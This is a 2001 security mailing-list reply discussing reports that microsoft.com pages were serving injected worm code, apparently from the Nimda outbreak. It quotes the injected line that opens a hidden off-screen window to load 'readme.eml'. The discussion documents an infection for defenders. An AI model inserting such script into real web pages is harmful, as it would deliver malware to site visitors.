Re: Please tell me I'm wrong: microsoft.com infected

From: Nick FitzGerald (nick@virus-l.demon.co.uk)
Date: Wed Sep 19 2001 - 15:31:51 PDT

    Rodrigo Goya <lucentat_private> wrote:

    > Confirmed
    >
    > I see it:
    >
    > window.open("readme.eml", null, "resizable=no,top=6000,left=6000")

    Ditto, as have several others.

    > Though it says "page not found".

    Ditto.

    I'd guess that the complex "physical" arrangement of such a large
    site, and perhaps update mirroring lags, means that not all servers
    have received their "updates" including that file yet.  (Also, they
    may have AV software or other measures preventing the EML files from
    getting on the servers, but be worried about the overhead of having
    the on-access scanners parsing their HTML files each time they are
    served...

    --
    Nick FitzGerald
    Computer Virus Consulting Ltd.